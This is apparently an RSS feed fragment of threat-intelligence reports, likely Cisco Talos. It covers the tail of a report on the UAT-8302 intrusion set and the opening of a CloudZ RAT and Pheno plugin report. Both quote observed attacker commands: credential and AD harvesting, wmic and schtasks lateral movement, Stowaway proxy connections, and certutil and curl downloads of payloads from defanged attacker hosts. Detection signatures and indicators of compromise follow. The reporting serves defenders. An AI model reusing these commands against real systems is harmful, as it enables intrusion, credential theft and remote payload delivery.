<!--kg-card-end: html-->
<p>Additionally, UAT-8302 uses a variety of scanning tools such as <a href="https://github.com/qi4L/qscan">QScan</a>, <a href="https://github.com/projectdiscovery/naabu">naabu</a> and <a href="https://github.com/SleepingBag945/dddd">dddd</a> &#xA0;PortQry and <a href="https://docs.projectdiscovery.io/opensource/httpx/overview">httpx</a> to discover services in the network:</p>
<!--kg-card-begin: html-->
<pre>
httpx.exe -sc -title -location -f -td -r 192.168.1.1/16
httpx.exe -sc -title -location -td -r 192.168.1.1/16 -o web.txt
httpx.exe -sc -title -location -td -u 192.168.1.1/16 -o web.txt
</pre>
<!--kg-card-end: html-->
<h2 id="information-collection">Information collection</h2><p>UAT-8302 collects a variety of information about the environment that they are operating within including Active Directory (AD) information and credentials using open-sourced tooling such as:</p><h3 id="adconnectdumppy">adconnectdump.py</h3><p>A Python-based tool for Azure AD Connect/Entra ID connect credential extraction:</p>
<!--kg-card-begin: html-->
<pre>
python.exe adconnectdump.py
</pre>
<!--kg-card-end: html-->
<h3 id="manual-extraction">Manual extraction</h3><p>UAT-8302 may also directly query the AD user and computer objects to obtain information from them via PowerShell:</p>
<!--kg-card-begin: html-->
<pre>
powershell -command Get-ADUser -Filter * -Property * | Select-Object Name, Displayname, LastLogonDate, PasswordLastSet, PasswordExpired, Description, EmailAddress, homeDirectory, scriptPath

powershell -command Get-ADUser -Filter * -Property * | Select-Object SamAccountName, DisplayName, Enabled, LastLogonDate, PasswordLastSet, PasswordExpired, Description, EmailAddress, HomeDirectory, ScriptPath, @{Name=&apos;Groups&apos;;Expression={((Get-ADUser $.SamAccountName -Properties MemberOf).MemberOf | ForEach-Object { ($ -split &apos;,&apos;)[0] -replace &apos;^CN=&apos; }) -join &apos;; &apos;}}

powershell -Command Get-ADComputer -Filter * -Property Name,DNSHostName,OperatingSystem,Description | Select-Object Name, DNSHostName, OperatingSystem, Description | Format-Table -AutoSize
powershell -Command Get-ADGroup -Filter * -Properties Members, Description | Select-Object Name, Description, @{Name=&apos;Members&apos;;Expression={ ($.Members | ForEach-Object { ($ -split &apos;,&apos;)[0] -replace &apos;^CN=&apos; }) -join &apos;; &apos; }}| Format-Table -AutoSize
</pre>
<!--kg-card-end: html-->
<p>Specific AD users of interest may also be queried using system tools such as dsmod and dsquery.</p><h3 id="log-collection">Log collection</h3><p>UAT-8302 also collects event log information and the logs themselves on multiple endpoints. Logs are an excellent source of obtaining information and understanding security configurations and policies applied within a target&#x2019;s environment:</p>
<!--kg-card-begin: html-->
<pre>
powershell -Command Get-WinEvent -ListLog Security | Format-List LogName, FileSize, LogMode, MaximumSizeInBytes, RecordCount

powershell -command Get-EventLog -LogName System -Source NETLOGON -Newest 5000 | Where-Object { $_.Message -match &quot;Administrator&quot; }

powershell -Command chcp 437 &gt;$null; Get-WinEvent -FilterHashtable @{ LogName = &apos;Security&apos;; ID = 4768 } | Where-Object { \$_.Message -match &apos;Administrador&apos; }
</pre>
<!--kg-card-end: html-->
<p>Audit policies are also queried extensively to obtain system logging configurations:</p>
<!--kg-card-begin: html-->
<pre>
auditpol /get /category:Logon/Logoff

auditpol /get /category:*
</pre>
<!--kg-card-end: html-->
<p>UAT-8302 also collects AD snapshots using tools such as the AD Explorer tool:</p>
<!--kg-card-begin: html-->
<pre>
ae.exe -snapshot c:\windows\temp\result.dat /accepteula

cmd.exe /C 7zr.exe a -mx=5 c:\windows\temp\r.7z c:\windows\temp\result.dat
</pre>
<!--kg-card-end: html-->
<p>UAT-8302 also uses a tool written in Simplified Chinese called &#x201C;<a href="https://github.com/mabangde/SharpGetUserLoginIPRPC">SharpGetUserLoginIPRP</a>&#x201D; &#x2014; derived from another <a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E8%8E%B7%E5%BE%97%E5%9F%9F%E7%94%A8%E6%88%B7%E7%9A%84%E7%99%BB%E5%BD%95%E4%BF%A1%E6%81%AF">Chinese-language repository</a> &#x2014; which is used to extract login information from a domain controller:</p>
<!--kg-card-begin: html-->
<pre>
C:\ProgramData\S.exe user:pass@IP -day
</pre>
<!--kg-card-end: html-->
<h2 id="proliferation-through-the-network">Proliferation through the network</h2><p>UAT-8302 proliferates across various endpoints by using a combination of either Impacket- or WMI-based remote process creation:</p>
<!--kg-card-begin: html-->
<pre>
cmd.exe /C wmic /node:IP process call create cmd.exe /c c:\programdata\e1.bat

cmd.exe /C schtasks /S IP /U username /P passwd /create /tn &apos;Runbat&apos; /tr &apos;c:\windows\temp\run.bat&apos; /sc ONCE /st 5:12 /ru SYSTEM /f
</pre>
<!--kg-card-end: html-->
<p>These BAT files are meant to execute the accompanying malware on the target systems.</p><p>Furthermore, UAT-8302 may also extract login credentials from MobaxXterm, a multi-functional and tabbed SSH client, using tools such as <a href="https://github.com/h0ny/MobaXtermDecryptor/">MobaXtermDecryptor</a> to pivot to other endpoints.</p><h2 id="custom-made-malware-deployment">Custom-made malware deployment</h2><p>UAT-8302 deploys a variety of malware families in their intrusions including NetDraft, CloudSorcerer version 3, and VSHELL.</p><h3 id="netdraft">NetDraft</h3><p>NetDraft, also known as&#xA0; <a href="https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/">NosyDoor</a>, is a .NET variant of the FINALDRAFT malware. FINALDRAFT or Squidoor is a malware family developed and operated exclusively by Jewelbug/REF7707/CL-STA-0049, a cluster of China-nexus APT actors. FINALDRAFT uses legitimate services such as MS Graph to act as command-and-control servers (C2s) to execute commands and payloads on the compromised system. Similarly, NetDraft relies on the MS Graph API to communicate with its OneDrive based C2. NetDraft is deployed using the following mechanism:</p><ul><li>A benign executable is used to side load a malicious dynamic-link library (DLL) based loader.</li><li>The loader DLL decodes NetDraft from an accompanying data file and invokes it in the context of the existing process.</li><li>NetDraft also contains an embedded, .NET-based helper library. The library is compressed and embedded using the Fody/Costura framework. During runtime, the library is decompressed and instrumented to carry out operations on the endpoint on behalf of NetDraft. We track this library as &#x201C;FringePorch.&#x201D;</li></ul><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-58ab9702-fb7d-48a4-92b4-db63c5a430b3.jpeg" class="kg-image" alt="UAT-8302 and its box full of malware" loading="lazy" width="936" height="840" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-58ab9702-fb7d-48a4-92b4-db63c5a430b3.jpeg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-58ab9702-fb7d-48a4-92b4-db63c5a430b3.jpeg 936w" sizes="(min-width: 720px) 720px"></figure><p><em>Figure 2. NetDraft and FringePorch infection chain.</em></p><p>NetDraft and FringePorch support the following functionalities:</p><ul><li>Execute arbitrary commands on the endpoint</li><li>Execute a .NET based assembly sent by the C2 within NetDraft&#x2019;s process context</li><li>Exit and stop execution</li><li>Upload files to C2</li><li>Download files from specified remote locations to local disks</li><li>File management: Change current working directory, rename files, enumerate files, and set write times</li><li>Sleep</li><li>Execute a .NET plugin: This functionality is similar to its ability to run arbitrary .NET based assemblies. Here, the implant runs a provided plugin&#x2019;s &#x201C;Plugin.Run&#x201D; function.</li></ul><p>Since NetDraft is missing the capability to persist across reboots and relogins, one of the first commands the C2 issues to it is the creation of a malicious scheduled task:</p>
<!--kg-card-begin: html-->
<pre>
schtasks /create /ru system /tn Microsoft\Windows\Maps\{a086ff1e-d6dc-45f7-b3e4-6udknw82sa} /sc hourly /mo 2 /tr &apos;C:\ProgramData\Microsoft\Microsoft\Appunion.exe&apos; /F
</pre>
<!--kg-card-end: html-->
<h2 id="cloudsorcerer-v3">CloudSorcerer v3</h2><p>Another malware UAT-8302 deploys is the latest version of the <a href="https://securelist.com/eastwind-apt-campaign/113345/">CloudSorcerer backdoor</a> (version 3). &#xA0;The malware consists of the side-loading triad of files: a benign executable, a malicious DLL-based loader, and the actual implant in a data file:</p>
<!--kg-card-begin: html-->
<pre>
Yandex.exe -r -p:test.ini -s:12

VMtools.exe -r -p:VM.ini -s:12
</pre>
<!--kg-card-end: html-->
<p>The executables will sideload a DLL named &#x201C;mspdb60[.]dll&#x201D;, which will load and decrypt the &#x201C;.ini&#x201D; file specified in the command line &#x2014; such as &#x201C;test.ini&#x201D; or &#x201C;vm.ini&#x201D;. The decrypted shellcode is then injected into a combination of specified benign processes.</p><h3 id="cloudsorcerer-v3-%E2%80%93-the-decrypted-shellcode">CloudSorcerer v3 &#x2013; The decrypted shellcode</h3><p>The decrypted INI file is a newer version of <a href="https://securelist.com/eastwind-apt-campaign/113345/">CloudSorcerer</a> (v3) disclosed by Kaspersky in 2024. Depending on process name (where it may have been initiated or injected), CloudSorcerer v3 will perform one of the following actions:</p><ul><li>If the process is named &#x201C;dpapimig.exe&#x201D;, then it will gather system information, inject itself into explorer.exe, and receive command codes from the C2 via a named pipe, gather disk information, enumerate files, execute arbitrary commands, perform file operations (delete, rename, read, write, etc.) and execute shellcode received via the named pipe.</li><li>If the process is named &#x201C;spoolsv.exe&#x201D;, then it will contact GitHub to obtain C2 information and receive commands from the C2.</li><li>If the process is named &#x201C;mspaint.exe&#x201D;, &#x201C;browser&#x201D;, or anything else, it will proceed to inject itself into dpapimg.exe, spoolsv.exe, etc. to kick off its malicious operations.</li></ul><p>The system information CloudSorcerer v3 collects includes computer name, username and local system time.</p><h4 id="obtaining-c2-information">Obtaining C2 information</h4><p>Like <a href="https://securelist.com/cloudsorcerer-new-apt-cloud-actor/113056/">CloudSorcerer v2</a>, version 3 contacts a legitimate service to obtain the C2 information. The malware will either contact a specific GitHub repository to read a data blob, or read a GameSpot profile the threat actors set up.</p><p>The data blob is decoded to obtain the C2 information, which can exist in the one of the following formats depending on the variant of the CloudSorcerer backdoor:</p><ul><li>A C2 URL for a domain or IP, controlled by UAT-8302, that the malware uses to begin communication with the C2 to carry out malicious operations</li><li>An access token to a legitimate service (such as OneDrive or Dropbox) that UAT-8302 uses to act as its C2 infrastructure to obtain next-stage payloads and commands</li></ul><h2 id="vshell-snowlight-and-snowrust">VSHELL, SNOWLIGHT and SNOWRUST</h2><p>In other instances, UAT-8302 deploys the VSHELL malware via a slightly different triad of artifacts for side-loading malware. The benign executable side-loads a malicious DLL named &#x201C;wininet[.]dll&#x201D; that reads a BIN file and injects it into &#x201C;explorer[.]exe&#x201D;.</p><p>The payload is position-independent shellcode that is injected into explorer[.]exe. The payload is a stager for the VSHELL malware that downloads and single-byte XORs the obtained payload with the key 0x99. The decoded payload is a garbled version of VSHELL.</p><p>It is worth noting that Talos observed the same <a href="https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/">single byte key and stager being used by UAT-6382</a> to deliver VSHELL malware in early 2025. Further investigation revealed that this stager is in fact <a href="https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect">SNOWLIGHT</a>, a lightweight downloader that can download and deploy a next stage payload. UNC5174 has been observed using SNOWLIGHT to download <a href="https://www.sysdig.com/blog/unc5174-chinese-threat-actor-vshell">Sliver</a> and <a href="https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures">VSHELL</a>. UNC5174 is a suspected China-nexus threat actor that typically exploits <a href="https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures">zero-day</a> and <a href="https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect">n-day</a> vulnerabilities to gain access to critical infrastructure organizations in the Americas.</p><p>Talos discovered that UAT-8302 also used a Rust based variant of SNOWLIGHT that we track as &#x201C;SNOWRUST.&#x201D; SNOWRUST is based on the <a href="https://github.com/tehstoni/LexiCrypt">LexiCrypt</a> Rust-based shellcode obfuscator. SNOWRUST simply decodes the embedded SNOWLIGHT shellcode and executes it to download the XOR encoded final payload, VSHELL, received from the C2.</p><p>In one intrusion, UAT-8302 used VSHELL to deploy a native driver from the <a href="https://github.com/theSecHunter/Hades-Windows/">Hades HIDS/HIPS</a> software &#x2014; an open-source Windows host monitoring kernel framework written in Simplified Chinese. The driver was specifically the System Monitoring filter driver that lets Hades register callbacks for process, thread, registry, and file events. This allows the driver to monitor the system and potentially allow, block, or hide events and artifacts.</p><h2 id="the-snappybeedeedrat-and-zingdoor-combo">The SNAPPYBEE/DeedRAT and ZingDoor combo</h2><p>In one instance, UAT-8302 first deployed a RAT family known as <a href="https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools/">DeedRAT</a>/<a href="https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html">SNAPPYBEE</a>. However, UAT-8302 almost immediately switched over to a DLL-based malware family known as <a href="https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html">ZingDoor</a>, first disclosed by Trend Micro in 2023, which <a href="https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html">has attributed both</a> DeedRAT and ZingDoor to the <a href="https://www.trendmicro.com/en_us/research/24/k/earth-estries.html">China-nexus threat actor</a> <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/earth_estries">Earth Estries</a>.</p><p>ZingDoor has also been deployed after the <a href="https://www.security.com/threat-intelligence/toolshell-china-zingdoor">successful exploitation of ToolShell in 2025</a> by China-nexus threat actors.</p><p>In parallel, UAT-8302 also deployed Draculoader, a generic shellcode loader, also used by the <a href="https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html">Earth Estries</a> and <a href="https://www.trendmicro.com/en_us/research/25/j/premier-pass-as-a-service.html">Earth Naga</a> APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere:</p>
<!--kg-card-begin: html-->
<pre>
C:\Documents and Settings\All Users\Microsoft\Crypto\RSA\d3d8.dll
</pre>
<!--kg-card-end: html-->
<h2 id="setting-up-additional-means-of-backdoor-access">Setting up additional means of backdoor access</h2><p>Once UAT-8302 deploys their custom-made malware, they begin establishing other means of backdoor access. One of the techniques used is setting up proxy servers on infected systems to tunnel traffic outside the enterprise to the infected hosts using tools such as <a href="https://github.com/ph4ntonn/Stowaway">Stowaway</a> (another tool written in Simplified Chinese):</p>
<!--kg-card-begin: html-->
<pre>
c:\windows\system32\wagent.exe -c 85[.]209[.]156[.]3:56456
  
cmd.exe /c (echo @echo off &amp;&amp; start c:\windows\temp\mmc.exe -l 85[.]209[.]156[.]3:56456 -s &lt;pass&gt; &amp;&amp; echo exit) &gt; c:\windows\temp\trun.bat
  
ag531.exe -c 45[.]135[.]135[.]100:443 -s &lt;blah&gt; -f AgreedUponByAllParties
</pre>
<!--kg-card-end: html-->
<p>UAT-8302 may use other tools such as <a href="https://github.com/wzshiming/anyproxy">anyproxy</a> to set up proxies within the infected enterprise&#x2019;s network:</p>
<!--kg-card-begin: html-->
<pre>
c:\users\public\any.exe
</pre>
<!--kg-card-end: html-->
<p>Furthermore, we observed UAT-8302 deploying the SoftEther VPN clients as well:</p>
<!--kg-card-begin: html-->
<pre>
certutil -urlcache -split -f hxxp://38[.]54[.]32[.]244/Rar.exe rar.exe
  
rar.exe x glb.rar
  
Communicator.exe /usermode
</pre>
<!--kg-card-end: html-->
<h2 id="coverage">Coverage</h2><p>The following ClamAV signatures detect and block this threat:</p><ul><li>Win.Loader.CloudSorcerer-10059633-0</li><li>Win.Loader.CloudSorcerer-10059634-0</li><li>Win.Malware.CloudSorcerer-10059635-0</li><li>Win.Tool.dddd-10059636-2</li><li>Win.Tool.dddd-10059637-0</li><li>Win.Loader.Donut-10059638-0</li><li>Win.Loader.Draculoader-10059639-0</li><li>Win.Tool.gogo-10059640-0</li><li>Win.Tool.gogo-10059641-0</li><li>Ps1.Tool.Microburst-10059642-0</li><li>Win.Tool.Mobaxtermdecryptor-10059643-0</li><li>Win.Malware.Netdraft-10059644-0</li><li>Win.Malware.Netdraft-10059645-0</li><li>Win.Malware.Netdraft-10059646-0</li><li>Win.Malware.Netdraft-10059647-0</li><li>Win.Malware.Snappybee-10059648-0</li><li>Win.Malware.Snappybee-10059649-0</li><li>Win.Malware.Snappybee-10059650-0</li><li>Win.Malware.Snappybee-10059651-0</li><li>Win.Malware.Snappybee-10059652-0</li><li>Win.Malware.Snappybee-10059653-0</li><li>Win.Malware.Snowrust-10059654-0</li><li>Win.Malware.Agent-10059655-0</li><li>Win.Malware.Stowaway-10059656-0</li><li>Win.Malware.Stowaway-10059657-0</li><li>Win.Loader.Agent-10059658-0</li><li>Win.Malware.Agent-10059659-0</li><li>Win.Malware.Agent-10059660-0</li><li>Win.Loader.Agent-10059661-1</li><li>Win.Malware.Agent-10059662-0</li></ul><p>The following Snort Rules (SIDs) detect and block this threat:</p><ul><li>66055, 66054, 301437, 301436, 301435, 301434, 301433, 301432, 301431</li><li>66052, 66053, 66050, 66051, 66048, 66049, 66046, 66047, 66044, 66045, 66042, 66043, 66040, 66041</li></ul><h2 id="indicators-of-compromise-iocs">Indicators of compromise (IOCs)</h2><p></p><p>IOCs for this threat are also available on our GitHub repository <a href="https://github.com/Cisco-Talos/IOCs/tree/main/2026/05" rel="noreferrer">here</a>.</p><p><strong>NetDraft, FringePorch</strong></p>
<!--kg-card-begin: html-->
<pre>
1139b39d3cc151ddd3d574617cf113608127850197e9695fef0b6d78df82d6ca
Ee56c49f42522637f401d15ac2a2b6f3423bfb2d5d37d071f0172ce9dc688d4b
51f0cf80a56f322892eed3b9f5ecae45f1431323600edbaea5cd1f28b437f6f2
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>VSHELL</strong></p>
<!--kg-card-begin: html-->
<pre>
35b2a5260b21ddb145486771ec2b1e4dc1f5b7f2275309e139e4abc1da0c614b
199bd156c81b2ef4fb259467a20eacaa9d861eeb2002f1570727c2f9ff1d5dab
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>ZingDoor</strong></p>
<!--kg-card-begin: html-->
<pre>
071e662fc5bc0e54bcfd49493467062570d0307dc46f0fb51a68239d281427c6
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Gogo</strong></p>
<!--kg-card-begin: html-->
<pre>
E74098b17d5d95e0014cf9c7f41f2a4e4be8baefc2b0eb42d39ae05a95b08ea5
2b627f6afe1364a7d0d832ccba87ef33a8a39f30a70a5f395e2a3cb0e2161cb3
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Stowaway</strong></p>
<!--kg-card-begin: html-->
<pre>
7c593ca40725765a0747cc3100b43a29b88ad1708ef77e915ab02686c0153001
F859a67ceebc52f0770a222b85a5002195089ee442eac4bea761c29be994e2ea
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>anyproxy</strong></p>
<!--kg-card-begin: html-->
<pre>
7d9c70fc36143eb33583c30430dcb40cf9d306067594cc30ffd113063acd6292
</pre>
<!--kg-card-end: html-->
<p>&#xA0;&#xA0;<strong>QScan</strong></p>
<!--kg-card-begin: html-->
<pre>
1bb59491f7289b94ab0130d7065d74d2459a802a7550ebf8cd0828f0a09c4d38
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Draculoader</strong></p>
<!--kg-card-begin: html-->
<pre>
843f8aea7842126e906cadbad8d81fa456c184fb5372c6946978a4fe115edb1c
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Dddd</strong></p>
<!--kg-card-begin: html-->
<pre>
343105919aa6df8a75ecb8b06b74f23a7d3e221fca56c67b728c50ea141314bc
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Httpx</strong></p>
<!--kg-card-begin: html-->
<pre>
4109f15056414f25140c7027092953264944664480dd53f086acb8e07d9fccab
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>SoftEther VPN</strong></p>
<!--kg-card-begin: html-->
<pre>
3dec6703b2cbc6157eb67e80061d27f9190c8301c9dd60eb0be1e8b096482d7e
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>SharpGetUserLogin</strong></p>
<!--kg-card-begin: html-->
<pre>
9f115e9b32111e4dc29343a2671ab10a2b38448657b24107766dc14ce528fceb
B19bfca2fc3fdabf0d0551c2e66be895e49f92aedac56654b1b0f51ec66e7404
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>Naabu</strong></p>
<!--kg-card-begin: html-->
<pre>
45cd169bf9cd7298d972425ad0d4e98512f29de4560a155101ab7427e4f4123f
</pre>
<!--kg-card-end: html-->
<p>&#xA0;<strong>PortQry</strong></p>
<!--kg-card-begin: html-->
<pre>
Fb6cebadd49d202c8c7b5cdd641bd16aac8258429e8face365a94bd32e253b00
</pre>
<!--kg-card-end: html-->
<p>&#xA0;&#xA0;</p><p><strong>Network IOCs</strong></p>
<!--kg-card-begin: html-->
<pre>
hxxps[://]www[.]drivelivelime[.]com
hxxps[://]www[.]drivelivelime[.]com/x
hxxps[://]www[.]drivelivelime[.]com/pw
www[.]drivelivelime[.]com
&#xA0;
hxxps[://]msiidentity[.]com
hxxps[://]msiidentity[.]com/pw
msiidentity[.]com
&#xA0;
hxxp[://]trafficmanagerupdate[.]com/index[.]php
trafficmanagerupdate[.]com
&#xA0;
image[.]update-kaspersky[.]workers[.]dev
update-kaspersky[.]workers[.]dev
&#xA0;
85[.]209[.]156[.]3
85[.]209[.]156[.]3:56456
85[.]209[.]156[.]3:46389
hxxp[://]85[.]209[.]156[.]3:8080/wagent[.]exe
hxxp[://]85[.]209[.]156[.]3:8082/wagent[.]exe
&#xA0;
&#xA0;
185[.]238[.]189[.]41
hxxp[://]185[.]238[.]189[.]41:8080&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;
&#xA0;
103[.]27[.]108[.]55
hxxp[://]103[.]27[.]108[.]55:48265/
&#xA0;
hxxp[://]38[.]54[.]32[.]244/Rar[.]exe
38[.]54[.]32[.]244
&#xA0;
45[.]140[.]168[.]62
88[.]151[.]195[.]133
156[.]238[.]224[.]82
45[.]135[.]135[.]100
</pre>
<!--kg-card-end: html-->
]]></content:encoded></item><item><title><![CDATA[CloudZ RAT potentially steals OTP messages using Pheno plugin]]></title><description><![CDATA[Cisco Talos discovered an intrusion, active since at least January 2026, where an unknown attacker implanted a CloudZ remote access tool (RAT) and a previously undocumented plugin called “Pheno.”]]></description><link>https://blog.talosintelligence.com/cloudz-pheno-infostealer/</link><guid isPermaLink="false">69f888cc594fe50001380f86</guid><category><![CDATA[Threat Spotlight]]></category><category><![CDATA[RAT]]></category><category><![CDATA[Cisco Talos Antivirus]]></category><category><![CDATA[Cisco Talos DNS Security]]></category><category><![CDATA[Cisco Talos Malware Protection]]></category><category><![CDATA[Cisco Talos Network Intrusion Prevention]]></category><dc:creator><![CDATA[Alex Karkins]]></dc:creator><pubDate>Tue, 05 May 2026 10:00:18 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_spotlight.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>Cisco Talos&#xA0;discovered&#xA0;an intrusion,&#xA0;active since&#xA0;at least&#xA0;January 2026,&#xA0;where an unknown attacker implanted a CloudZ remote access&#xA0;tool (RAT)&#xA0;and&#xA0;a previously undocumented plugin called &#x201C;Pheno.&#x201D;</li><li>According to the functionalities of the&#xA0;CloudZ&#xA0;RAT and&#xA0;Pheno&#xA0;plugin, this was&#xA0;with&#xA0;the&#xA0;intention&#xA0;of stealing&#xA0;victims&#x2019;&#xA0;credentials and&#xA0;potentially&#xA0;one-time passwords&#xA0;(OTPs).&#xA0;</li><li>CloudZ&#xA0;utilizes&#xA0;the custom&#xA0;Pheno&#xA0;plugin&#xA0;to hijack the established PC-to-phone bridge by abusing the Microsoft Phone Link application, allowing&#xA0;the plugin&#xA0;to continuously scan for active Phone Link processes and potentially intercept sensitive mobile data like SMS and OTPs without deploying malware on the phone.&#xA0;</li><li>CloudZ&#xA0;evades detection by executing critical malicious functions dynamically in system memory and performing checks to avoid debuggers and sandbox environments.&#xA0;</li></ul><h2 id="attacker-abuses-the-windows-phone-link-application">Attacker abuses&#xA0;the Windows Phone Link application&#xA0;</h2><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/threat_spotlight.jpg" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin"><p>Windows Phone Link (formerly&#xA0;&quot;Your Phone&quot;) is a synchronization tool developed by Microsoft and built directly into Windows 10 and 11 that bridges a PC and a smartphone (Android or iPhone).&#xA0;By&#xA0;establishing&#xA0;a secure connection via Wi-Fi and Bluetooth, the application mirrors essential phone activities&#xA0;(such as&#xA0;application&#xA0;notifications and&#xA0;SMS&#xA0;messages)&#xA0;onto the computer screen, reducing&#xA0;the user&#x2019;s&#xA0;need to physically&#xA0;interact with the&#xA0;mobile device&#xA0;while working on the computer.&#xA0;The&#xA0;Phone Link application writes&#xA0;synchronized&#xA0;phone data such as SMS messages, call&#xA0;logs,&#xA0;and the application&#xA0;notification&#xA0;history&#xA0;to the Windows PC in the application&#x2019;s SQLite database file.&#xA0;</p><p>Talos observed that&#xA0;during an intrusion,&#xA0;an attacker&#xA0;attempted&#xA0;to abuse the Windows Phone Link application using the&#xA0;CloudZ&#xA0;RAT&#xA0;and its&#xA0;Pheno&#xA0;plugin. The&#xA0;Pheno&#xA0;plugin is designed&#xA0;to&#xA0;monitor&#xA0;an active PC-to-phone bridge&#xA0;established&#xA0;by the Phone Link application on the victim machine.&#xA0;With a confirmed Phone Link activity on the victim&apos;s machine, the attacker&#xA0;using the&#xA0;CloudZ&#xA0;RAT&#xA0;can&#xA0;potentially&#xA0;intercept&#xA0;the Phone Link application&#x2019;s&#xA0;SQLite database file&#xA0;(e.g.,&#xA0;&#x201C;PhoneExperiences-*.db&#x201D;)&#xA0;on the victim machine,&#xA0;potentially&#xA0;compromising&#xA0;SMS-based OTP&#xA0;messages&#xA0;and other authenticator application notification messages.&#xA0;</p><h2 id="intrusion-summary-of-cloudz-infection">Intrusion summary of&#xA0;CloudZ&#xA0;infection&#xA0;</h2><p>Talos discovered from telemetry data that the intrusion had begun with an unknown&#xA0;initial&#xA0;access&#xA0;vector&#xA0;to the victim&apos;s environment, which&#xA0;led to the execution of a fake&#xA0;ScreenConnect&#xA0;application update executable.&#xA0;This malicious executable drop&#xA0;and executes&#xA0;an intermediate .NET loader executable, which&#xA0;subsequently&#xA0;deploys&#xA0;the modular&#xA0;CloudZ&#xA0;on the victim&#x2019;s machine. Upon execution, the RAT&#xA0;decrypts&#xA0;its configuration data,&#xA0;establishes&#xA0;an encrypted socket connection to the&#xA0;command-and-control (C2)&#xA0;server, and&#xA0;enters its command dispatcher mode.&#xA0;&#xA0;&#xA0;</p><p>CloudZ&#xA0;facilitates the&#xA0;C2&#xA0;commands to exfiltrate credentials from the&#xA0;victim&#xA0;machine browser data, and it downloads and implants a plugin.&#xA0;The plugin performs reconnaissance of&#xA0;the&#xA0;Microsoft Phone Link application on the victim machine and writes the&#xA0;reconnaissance&#xA0;data to an output file in a staging folder.&#xA0;CloudZ&#xA0;reads back the Phone Link application data from the staging folder and sends it to the C2 server.&#xA0;</p><h2 id="rust-compiled-executable-used-as-a-dropper">Rust-compiled executable used as a dropper&#xA0;</h2><p>Talos discovered a Rust-compiled 64-bit executable,&#xA0;disguised with file&#xA0;names&#xA0;such as&#xA0;&#x201C;systemupdates.exe&#x201D;&#xA0;or&#xA0;&#x201C;Windows-interactive-update.exe&#x201D;,&#xA0;functioning as a&#xA0;loader. The malicious&#xA0;loader&#xA0;was compiled on Jan.&#xA0;1, 2026, and has&#xA0;the&#xA0;developer string of&#xA0;<code>rustextractor.pdb</code>.&#xA0;</p><p>When&#xA0;the loader is run on the victim machine, it decrypts&#xA0;and drops&#xA0;an&#xA0;embedded .NET loader binary disguised as a text file with the file names&#xA0;&#x201C;update.txt&#x201D; or &#x201C;msupdate.txt&#x201D; in the folder &#x201C;C:\ProgramData\Microsoft\windosDoc\&#x201D;.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-ccac0ae2-99ab-4114-a0be-c3ab035942cb-1.png" class="kg-image" alt="CloudZ RAT potentially steals OTP messages using Pheno plugin" loading="lazy" width="624" height="128" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-ccac0ae2-99ab-4114-a0be-c3ab035942cb-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-ccac0ae2-99ab-4114-a0be-c3ab035942cb-1.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure 1. Excerpt of rusty dropper code. </span></figcaption></figure><p>In another instance,&#xA0;Talos&#xA0;observed&#xA0;that&#xA0;the .NET&#xA0;loader&#xA0;was implanted&#xA0;in the victim machine&#xA0;by downloading&#xA0;it&#xA0;from an attacker-controlled staging server using the command shown below:&#xA0;&#xA0;</p>
<!--kg-card-begin: html-->
<pre>curl -L -o C:\ProgramData\Microsoft\WindowsDoc\update[.]txt hxxps[://]calm-wildflower-1349[.]hellohiall[.]workers[.]dev</pre>
<!--kg-card-end: html-->
